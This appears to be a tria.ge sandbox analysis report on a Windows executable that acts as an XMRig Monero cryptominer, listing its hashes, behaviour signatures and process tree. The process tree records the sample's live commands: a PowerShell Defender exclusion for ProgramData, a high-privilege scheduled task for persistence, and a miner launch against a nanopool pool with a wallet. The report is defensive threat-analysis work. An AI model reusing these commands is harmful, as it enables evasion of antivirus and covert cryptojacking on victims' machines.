Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
42s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
27/12/2022, 15:13
General
-
Target
file.exe
-
Size
2.7MB
-
MD5
4f62eb4f1a2c1fc46df059120e6e6cef
-
SHA1
bd2fcde45f562ec5b0c741fa102c3dfa0234d511
-
SHA256
6ee27f5f4be9f1cfeb98b5190367ca60d1c81b527b730d808b4b29e30b44931d
-
SHA512
38c9d721302f345a8c1efcf6d40a735e181b67d2fe8e19bf5a20e6347de325f1c974f553ad640553f1fe3546729600a8d485964a36fbb6d76d7c58244ac72dd3
-
SSDEEP
49152:IvEl6mjUImipdKvT6QD66iMVptYC0qs7QVlWSwI9SrxCsU:IamScvPfOCHs8yCs
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 13 IoCs
-
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of WriteProcessMemory 24 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
124KB
-
Filesize
12KB
-
Filesize
124KB
-
Filesize
11.4MB
-
Filesize
12KB
-
Filesize
10.1MB
-
Filesize
8KB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
128KB
-
Filesize
7.8MB
-
Filesize
344KB
-
Filesize
3.1MB
-
Filesize
136KB
-
Filesize
2.1MB
-
Filesize
260KB
-
Filesize
124KB
-
Filesize
92KB
-
Filesize
112KB
-
Filesize
392KB
-
Filesize
308KB
-
Filesize
400KB
-
Filesize
452KB
-
Filesize
148KB
-
Filesize
156KB
-
Filesize
216KB
-
Filesize
364KB
-
Filesize
1.2MB
-
Filesize
860KB
-
Filesize
444KB
-
Filesize
2.0MB
-
Filesize
260KB
-
Filesize
3.1MB
-
Filesize
1.2MB
-
Filesize
9.9MB
-
Filesize
876KB
-
Filesize
988KB
-
Filesize
452KB
-
Filesize
432KB
-
Filesize
1.1MB
-
Filesize
636KB
-
Filesize
1000KB
-
Filesize
412KB
-
Filesize
624KB